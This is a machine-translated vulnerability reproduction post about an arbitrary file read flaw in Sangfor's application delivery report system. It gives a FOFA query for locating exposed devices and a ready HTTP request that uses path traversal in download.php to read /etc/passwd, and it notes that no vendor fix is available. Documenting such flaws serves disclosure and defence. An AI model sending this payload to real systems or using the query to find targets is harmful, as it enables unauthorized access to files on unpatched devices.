Система отчетов о доставке приложений Sangfor имеет уязвимость чтения произвольных файлов

Enterprise 2023-08-26 00:28:03 views: null

Каталог статей

Система отчетов о доставке приложений Sangfor имеет уязвимость чтения произвольных файлов

Отказ от ответственности: Не используйте соответствующие технологии, описанные в этой статье, для участия в незаконном тестировании. Любые прямые или косвенные последствия и убытки, вызванные распространением и использованием информации или инструментов, представленных в этой статье, несет сам пользователь. Неблагоприятные последствия имеют никакого отношения к автору статьи. Эта статья предназначена только для образовательных целей.

1. Введение в систему отчетности о доставке приложений Sangfor.

Поиск по официальному аккаунту WeChat: Библиотека повторного появления уязвимостей Наньфэн
Эта статья была впервые опубликована на официальном аккаунте Библиотеки повторного появления уязвимостей Наньфэн.

Система отчетов о доставке заявок Sangfor

2. Описание уязвимости

SINFOR AD — это новейшая серия устройств доставки приложений, выпущенная компанией Sangfor, отличительной особенностью которой является функция интеллектуального анализа SINFOR AD. В системе отчетов о доставке приложений Sangfor существует уязвимость чтения произвольных файлов, и злоумышленник может использовать эту уязвимость для чтения файла по указанному пути на устройстве.

Номер CVE:
Номер CNNVD:
Номер CNVD:

3. Влиять на версию

Система отчетов о доставке заявок Sangfor
Система отчетов о доставке приложений Sangfor имеет уязвимость чтения произвольных файлов

4. оператор запроса fofa

app="SANGFOR-Система отчетности о доставке приложений"

5. Повторение уязвимости

Ссылка на уязвимость: http://xx.xx.xxx.xx:85/report/download.php?pdf=…/…/…/…/…/etc/passwd
Пакет данных об уязвимостях:

GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

Система отчетов о доставке приложений Sangfor имеет уязвимость чтения произвольных файлов

6.POC&EXP

Подпишитесь на официальный аккаунт Nanfeng Vulnerability Reproduction Library и ответьте на Vulnerability Reproduction 34, чтобы получить адрес загрузки инструмента POC:
Система отчетов о доставке приложений Sangfor имеет уязвимость чтения произвольных файлов

7. Мнения по исправлению ситуации

Производитель еще не предоставил решение для ремонта, обратите внимание на обновление домашней страницы производителя: https://www.sangfor.com.cn/

8. Прошлый обзор

Supongo que te gusta

Origin blog.csdn.net/nnn2188185/article/details/131218397
Recomendado
Clasificación
Diario
Más
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)
2024-06-05(0)
2024-06-04(0)
2024-06-03(1)

Code World

© 2018 codetd.com